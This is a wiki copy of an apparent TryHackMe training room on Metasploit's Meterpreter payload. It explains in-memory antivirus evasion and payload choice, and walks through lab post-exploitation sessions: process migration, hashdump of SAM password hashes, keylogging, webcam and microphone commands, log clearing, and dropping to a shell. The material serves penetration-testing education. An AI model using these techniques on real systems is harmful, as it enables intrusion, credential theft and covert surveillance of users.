<!--
title: Meterpreter
description: 
published: true
date: 2022-10-25T18:46:58.950Z
tags: 
editor: ckeditor
dateCreated: 2022-10-25T18:46:56.154Z
-->

<h1>Introduction to Meterpreter</h1>
<p>Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a command and control architecture. You will interact with the target operating system and files and use Meterpreter's specialized commands.</p>
<p>Meterpreter has many versions which will provide different functionalities based on the target system.</p>
<p><strong>How does Meterpreter work?</strong></p>
<p>Meterpreter runs on the target system but is not installed on it. It runs in memory and does not write itself to the disk on the target. This feature aims to avoid being detected during antivirus scans. By default, most antivirus software will scan new files on the disk (e.g. when you download a file from the internet) Meterpreter runs in memory (RAM - Random Access Memory) to avoid having a file that has to be written to the disk on the target system (e.g. meterpreter.exe). This way, Meterpreter will be seen as a process and not have a file on the target system.</p>
<p>Meterpreter also aims to avoid being detected by network-based IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) solutions by using encrypted communication with the server where Metasploit runs (typically your attacking machine). If the target organization does not decrypt and inspect encrypted traffic (e.g. HTTPS) coming to and going out of the local network, IPS and IDS solutions will not be able to detect its activities.</p>
<p>While Meterpreter is recognized by major antivirus software, this feature provides some degree of stealth.</p>
<p>The example below shows a target Windows machine exploited using the MS17-010 vulnerability. You will see Meterpreter is running with a process ID (PID) of 1304; this PID will be different in your case. We have used the <code>getpid</code>&nbsp;command, which returns the process ID with which Meterpreter is running. The process ID (or process identifier) is used by operating systems to identify running processes. All processes running in Linux or Windows will have a unique ID number; this number is used to interact with the process when the need arises (e.g. if it needs to be stopped).<br>Getpid</p>
<pre><code class="language-plaintext">meterpreter &gt; getpid 
Current pid: 1304</code></pre>
<p>If we list processes running on the target system using the&nbsp;</p>
<p><code>ps</code></p>
<p>&nbsp;command, we see PID 1304 is spoolsv.exe and not Meterpreter.exe, as one might expect.</p>
<p>The ps command</p>
<pre><code class="language-plaintext">meterpreter &gt; ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]                                                   
 4     0     System                x64   0                                      
 396   644   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 428   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 548   540   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 596   540   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 604   588   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 644   588   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 692   596   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 700   692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  
 716   596   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe  1276  1304  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\cmd.exe
 1304  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1340  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1388  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe</code></pre>
<p>Even if we were to go a step further and look at DLLs (Dynamic-Link Libraries) used by the Meterpreter process (PID 1304 in this case), we still would not find anything jumping at us (e.g. no meterpreter.dll)</p>
<p>The Meterpreter process</p>
<pre><code class="language-plaintext">C:\Windows\system32&gt;tasklist /m /fi "pid eq 1304"
tasklist /m /fi "pid eq 1304"

Image Name                     PID Modules                                     
========================= ======== ============================================
spoolsv.exe                   1304 ntdll.dll, kernel32.dll, KERNELBASE.dll,    
                                   msvcrt.dll, sechost.dll, RPCRT4.dll,        
                                   USER32.dll, GDI32.dll, LPK.dll, USP10.dll,  
                                   POWRPROF.dll, SETUPAPI.dll, CFGMGR32.dll,   
                                   ADVAPI32.dll, OLEAUT32.dll, ole32.dll,      
                                   DEVOBJ.dll, DNSAPI.dll, WS2_32.dll,         
                                   NSI.dll, IMM32.DLL, MSCTF.dll,              
                                   CRYPTBASE.dll, slc.dll, RpcRtRemote.dll,    
                                   secur32.dll, SSPICLI.DLL, credssp.dll,      
                                   IPHLPAPI.DLL, WINNSI.DLL, mswsock.dll,      
                                   wshtcpip.dll, wship6.dll, rasadhlp.dll,     
                                   fwpuclnt.dll, CLBCatQ.DLL, umb.dll,         
                                   ATL.DLL, WINTRUST.dll, CRYPT32.dll,         
                                   MSASN1.dll, localspl.dll, SPOOLSS.DLL,      
                                   srvcli.dll, winspool.drv,                   
                                   PrintIsolationProxy.dll, FXSMON.DLL,        
                                   tcpmon.dll, snmpapi.dll, wsnmp32.dll,       
                                   msxml6.dll, SHLWAPI.dll, usbmon.dll,        
                                   wls0wndh.dll, WSDMon.dll, wsdapi.dll,       
                                   webservices.dll, FirewallAPI.dll,           
                                   VERSION.dll, FunDisc.dll, fdPnp.dll,        
                                   winprint.dll, USERENV.dll, profapi.dll,     
                                   GPAPI.dll, dsrole.dll, win32spl.dll,        
                                   inetpp.dll, DEVRTL.dll, SPINF.dll,          
                                   CRYPTSP.dll, rsaenh.dll, WINSTA.dll,        
                                   cscapi.dll, netutils.dll, WININET.dll,      
                                   urlmon.dll, iertutil.dll, WINHTTP.dll,      
                                   webio.dll, SHELL32.dll, MPR.dll,            
                                   NETAPI32.dll, wkscli.dll, PSAPI.DLL,        
                                   WINMM.dll, dhcpcsvc6.DLL, dhcpcsvc.DLL,     
                                   apphelp.dll, NLAapi.dll, napinsp.dll,       
                                   pnrpnsp.dll, winrnr.dll                     

C:\Windows\system32&gt;</code></pre>
<p>Techniques and tools that can be used to detect Meterpreter are beyond the scope of this room. This section aimed to show you how stealthy Meterpreter is running; remember, most antivirus software will detect it.</p>
<p>It is also worth noting that Meterpreter will establish an encrypted (TLS) communication channel with the attacker's system.</p>
<h1>Meterpreter Flavors</h1>
<p>As discussed in the previous Metasploit rooms, linked below, Metasploit payloads can be initially divided into two categories; inline (also called single) and staged.</p>
<p>Introduction to Metasploit:&nbsp;<a href="https://www.tryhackme.com/jr/metasploitintro">https://www.tryhackme.com/jr/metasploitintro</a></p>
<p>Scanning and Exploitation with Metasploit:&nbsp;<a href="https://www.tryhackme.com/jr/metasploitexploitation">https://www.tryhackme.com/jr/metasploitexploitation</a></p>
<p>As you will remember, staged payloads are sent to the target in two steps. An initial part is installed (the stager) and requests the rest of the payload. This allows for a smaller initial payload size. The inline payloads are sent in a single step. Meterpreter payloads are also divided into stagged and inline versions. However, Meterpreter has a wide range of different versions you can choose from based on your target system.&nbsp;</p>
<p>The easiest way to have an idea about available Meterpreter versions could be to list them using msfvenom, as seen below.&nbsp;</p>
<p>We have used the <code>msfvenom --list payloads</code>&nbsp;command and grepped "meterpreter" payloads (adding <code>| grep meterpreter</code> to the command line), so the output only shows these. You can try this command on the AttackBox.&nbsp;</p>
<p>Listing Meterpreter payloads</p>
<pre><code class="language-plaintext">root@ip-10-10-186-44:~# msfvenom --list payloads | grep meterpreter
    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS
    android/meterpreter/reverse_tcp                     Run a meterpreter server in Android. Connect back stager
    android/meterpreter_reverse_http                    Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_https                   Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_tcp                     Connect back to the attacker and spawn a Meterpreter shell
    apple_ios/aarch64/meterpreter_reverse_http          Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/aarch64/meterpreter_reverse_https         Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/aarch64/meterpreter_reverse_tcp           Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/armle/meterpreter_reverse_http            Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/armle/meterpreter_reverse_https           Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/armle/meterpreter_reverse_tcp             Run the Meterpreter / Mettle server payload (stageless)
    java/meterpreter/bind_tcp                           Run a meterpreter server in Java. Listen for a connection
    java/meterpreter/reverse_http                       Run a meterpreter server in Java. Tunnel communication over HTTP
    java/meterpreter/reverse_https                      Run a meterpreter server in Java. Tunnel communication over HTTPS
    java/meterpreter/reverse_tcp                        Run a meterpreter server in Java. Connect back stager
    linux/aarch64/meterpreter/reverse_tcp               Inject the mettle server payload (staged). Connect back to the attacker
    linux/aarch64/meterpreter_reverse_http              Run the Meterpreter / Mettle server payload (stageless)
    linux/aarch64/meterpreter_reverse_https             Run the Meterpreter / Mettle server payload (stageless)
    linux/aarch64/meterpreter_reverse_tcp               Run the Meterpreter / Mettle server payload (stageless)
    linux/armbe/meterpreter_reverse_http                Run the Meterpreter / Mettle server payload (stageless)
    linux/armbe/meterpreter_reverse_https               Run the Meterpreter / Mettle server payload (stageless)
    linux/armbe/meterpreter_reverse_tcp                 Run the Meterpreter / Mettle server payload (stageless)
    linux/armle/meterpreter/bind_tcp                    Inject the mettle server payload (staged). Listen for a connection
    linux/armle/meterpreter/reverse_tcp                 Inject the mettle server payload (staged). Connect back to the attacker [...]</code></pre>
<p>The list will show Meterpreter versions available for the following platforms;</p>
<ul>
  <li>Android</li>
  <li>Apple iOS</li>
  <li>Java</li>
  <li>Linux</li>
  <li>OSX</li>
  <li>PHP</li>
  <li>Python</li>
  <li>Windows</li>
</ul>
<p>Your decision on which version of Meterpreter to use will be mostly based on three factors;</p>
<ul>
  <li>The target operating system (Is the target operating system Linux or Windows? Is it a Mac device? Is it an Android phone? etc.)</li>
  <li>Components available on the target system (Is Python installed? Is this a PHP website? etc.)</li>
  <li>Network connection types you can have with the target system (Do they allow raw TCP connections? Can you only have an HTTPS reverse connection? Are IPv6 addresses not as closely monitored as IPv4 addresses? etc.)&nbsp;</li>
</ul>
<p>If you are not using Meterpreter as a standalone payload generated by Msfvenom, your choice may also be limited by the exploit. You will notice some exploits will have a default Meterpreter payload, as you can see in the example below with the <code>ms17_010_eternalblue</code> exploit.&nbsp;</p>
<p>Default payload for MS17-010</p>
<pre><code class="language-plaintext">msf6 &gt; use exploit/windows/smb/ms17_010_eternalblue 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) &gt;</code></pre>
<p>You can also list other available payloads using the <code>show payloads</code> command with any module.&nbsp;</p>
<p>Available payloads</p>
<pre><code class="language-plaintext">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; show payloads 

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   generic/custom                                               manual  No     Custom Payload
   1   generic/shell_bind_tcp                                       manual  No     Generic Command Shell, Bind TCP Inline
   2   generic/shell_reverse_tcp                                    manual  No     Generic Command Shell, Reverse TCP Inline
   3   windows/x64/exec                                             manual  No     Windows x64 Execute Command
   4   windows/x64/loadlibrary                                      manual  No     Windows x64 LoadLibrary Path
   5   windows/x64/messagebox                                       manual  No     Windows MessageBox x64
   6   windows/x64/meterpreter/bind_ipv6_tcp                        manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   windows/x64/meterpreter/bind_ipv6_tcp_uuid                   manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   windows/x64/meterpreter/bind_named_pipe                      manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager [...]</code></pre>
<h1>Meterpreter Commands</h1>
<p>Typing <code>help</code>&nbsp;on any Meterpreter session (shown by <code>meterpreter&gt;</code> at the prompt) will list all available commands.</p>
<p>The Meterpreter help menu</p>
<pre><code class="language-plaintext">meterpreter &gt; help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel[...]</code></pre>
<p>Every version of Meterpreter will have different command options, so running the&nbsp;</p>
<p><code>help</code></p>
<p>&nbsp;command is always a good idea. Commands are built-in tools available on Meterpreter. They will run on the target system without loading any additional script or executable files.</p>
<p>Meterpreter will provide you with three primary categories of tools;</p>
<ul>
  <li>Built-in commands</li>
  <li>Meterpreter tools</li>
  <li>Meterpreter scripting</li>
</ul>
<p>If you run the <code>help</code>&nbsp;command, you will see Meterpreter commands are listed under different categories.</p>
<ul>
  <li>Core commands</li>
  <li>File system commands</li>
  <li>Networking commands</li>
  <li>System commands</li>
  <li>User interface commands</li>
  <li>Webcam commands</li>
  <li>Audio output commands</li>
  <li>Elevate commands</li>
  <li>Password database commands</li>
  <li>Timestomp commands</li>
</ul>
<p>Please note that the list above was taken from the output of the <code>help</code>&nbsp;command on the Windows version of Meterpreter (windows/x64/meterpreter/reverse_tcp). These will be different for other Meterpreter versions.</p>
<p><strong>Meterpreter commands</strong></p>
<p>Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used. Remember to check all available commands running the help command once a Meterpreter session has started.</p>
<p>Core commands</p>
<ul>
  <li><code>background</code>: Backgrounds the current session</li>
  <li><code>exit</code>: Terminate the Meterpreter session</li>
  <li><code>guid</code>: Get the session GUID (Globally Unique Identifier)</li>
  <li><code>help</code>: Displays the help menu</li>
  <li><code>info</code>: Displays information about a Post module</li>
  <li><code>irb</code>: Opens an interactive Ruby shell on the current session</li>
  <li><code>load</code>: Loads one or more Meterpreter extensions</li>
  <li><code>migrate</code>: Allows you to migrate Meterpreter to another process</li>
  <li><code>run</code>: Executes a Meterpreter script or Post module</li>
  <li><code>sessions</code>: Quickly switch to another session</li>
</ul>
<p>File system commands</p>
<ul>
  <li><code>cd</code>: Will change directory</li>
  <li><code>ls</code>: Will list files in the current directory (dir will also work)</li>
  <li><code>pwd</code>: Prints the current working directory</li>
  <li><code>edit</code>: will allow you to edit a file</li>
  <li><code>cat</code>: Will show the contents of a file to the screen</li>
  <li><code>rm</code>: Will delete the specified file</li>
  <li><code>search</code>: Will search for files</li>
  <li><code>upload</code>: Will upload a file or directory</li>
  <li><code>download</code>: Will download a file or directory</li>
</ul>
<p>Networking commands</p>
<ul>
  <li><code>arp</code>: Displays the host ARP (Address Resolution Protocol) cache</li>
  <li><code>ifconfig</code>: Displays network interfaces available on the target system</li>
  <li><code>netstat</code>: Displays the network connections</li>
  <li><code>portfwd</code>: Forwards a local port to a remote service</li>
  <li><code>route</code>: Allows you to view and modify the routing table</li>
</ul>
<p>System commands</p>
<ul>
  <li><code>clearev</code>: Clears the event logs</li>
  <li><code>execute</code>: Executes a command</li>
  <li><code>getpid</code>: Shows the current process identifier</li>
  <li><code>getuid</code>: Shows the user that Meterpreter is running as</li>
  <li><code>kill</code>: Terminates a process</li>
  <li><code>pkill</code>: Terminates processes by name</li>
  <li><code>ps</code>: Lists running processes</li>
  <li><code>reboot</code>: Reboots the remote computer</li>
  <li><code>shell</code>: Drops into a system command shell</li>
  <li><code>shutdown</code>: Shuts down the remote computer</li>
  <li><code>sysinfo</code>: Gets information about the remote system, such as OS</li>
</ul>
<p>Others Commands (these will be listed under different menu categories in the help menu)</p>
<ul>
  <li><code>idletime</code>: Returns the number of seconds the remote user has been idle</li>
  <li><code>keyscan_dump</code>: Dumps the keystroke buffer</li>
  <li><code>keyscan_start</code>: Starts capturing keystrokes</li>
  <li><code>keyscan_stop</code>: Stops capturing keystrokes</li>
  <li><code>screenshare</code>: Allows you to watch the remote user's desktop in real time</li>
  <li><code>screenshot</code>: Grabs a screenshot of the interactive desktop</li>
  <li><code>record_mic</code>: Records audio from the default microphone for X seconds</li>
  <li><code>webcam_chat</code>: Starts a video chat</li>
  <li><code>webcam_list</code>: Lists webcams</li>
  <li><code>webcam_snap</code>: Takes a snapshot from the specified webcam</li>
  <li><code>webcam_stream</code>: Plays a video stream from the specified webcam</li>
  <li><code>getsystem</code>: Attempts to elevate your privilege to that of local system</li>
  <li><code>hashdump</code>: Dumps the contents of the SAM database</li>
</ul>
<p>Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment.</p>
<h1>Post-Exploitation with Meterpreter</h1>
<p>Meterpreter provides you with many useful commands that facilitate the post-exploitation phase. Below are a few examples you will often use.</p>
<p><strong>Help</strong></p>
<p>This command will give you a list of all available commands in Meterpreter. As we have seen earlier, Meterpreter has many versions, and each version may have different options available. Typing help once you have a Meterpreter session will help you quickly browse through available commands.</p>
<p>The Meterpreter help menu</p>
<pre><code class="language-plaintext">meterpreter &gt; help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel[...]</code></pre>
<p><strong>Meterpreter commands</strong></p>
<p>The <code>getuid</code>&nbsp;command will display the user with which Meterpreter is currently running. This will give you an idea of your possible privilege level on the target system (e.g. Are you an admin level user like NT AUTHORITY\SYSTEM or a regular user?)</p>
<p>The getuid command</p>
<pre><code class="language-plaintext">meterpreter &gt; getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter &gt;</code></pre>
<p>The <code>ps</code> command will list running processes. The PID column will also give you the PID information you will need to migrate Meterpreter to another process.</p>
<p>The ps command</p>
<pre><code class="language-plaintext">meterpreter &gt; ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]                                                   
 4     0     System                x64   0                                      
 396   644   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 428   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 548   540   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 596   540   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 604   588   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 644   588   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 692   596   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 700   692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  
 716   596   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 724   596   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 764   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 828   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 864   828   WmiPrvSE.exe                                                       
 900   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  
 952   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1076  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1164  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 1168  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  
 1244  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 1276  1304  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\cmd.exe
 1304  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1340  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1388  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe[...]</code></pre>
<p><strong>Migrate</strong></p>
<p>Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the <code>keyscan_start</code>, <code>keyscan_stop</code>, and <code>keyscan_dump</code> command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session.</p>
<p>To migrate to any process, you need to type the migrate command followed by the PID of the desired target process. The example below shows Meterpreter migrating to process ID 716.</p>
<p>The migrate command</p>
<pre><code class="language-plaintext">meterpreter &gt; migrate 716
[*] Migrating from 1304 to 716...
[*] Migration completed successfully.
meterpreter &gt;</code></pre>
<p>Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.</p>
<p><strong>Hashdump</strong></p>
<p>The <code>hashdump</code>&nbsp;command will list the content of the SAM database. The SAM (Security Account Manager) database stores user's passwords on Windows systems. These passwords are stored in the NTLM (New Technology LAN Manager) format.</p>
<p>The hashdump command</p>
<pre><code class="language-plaintext">meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter &gt;</code></pre>
<p>While it is not mathematically possible to "crack" these hashes, you may still discover the cleartext password using online NTLM databases or a rainbow table attack. These hashes can also be used in Pass-the-Hash attacks to authenticate to other systems that these users can access the same network.</p>
<p><strong>Search</strong></p>
<p>The <code>search</code>&nbsp;command is useful to locate files with potentially juicy information. In a CTF context, this can be used to quickly find a flag or proof file, while in actual penetration testing engagements, you may need to search for user-generated files or configuration files that may contain password or account information.</p>
<p>The search command</p>
<pre><code class="language-plaintext">meterpreter &gt; search -f flag2.txt
Found 1 result...
    c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter &gt;</code></pre>
<p><strong>Shell</strong></p>
<p>The shell command will launch a regular command-line shell on the target system. Pressing CTRL+Z will help you go back to the Meterpreter shell.</p>
<p>The shell command</p>
<pre><code class="language-plaintext">meterpreter &gt; shell
Process 2124 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&gt;</code></pre>
<p>&nbsp;</p>
<p>&nbsp;</p>
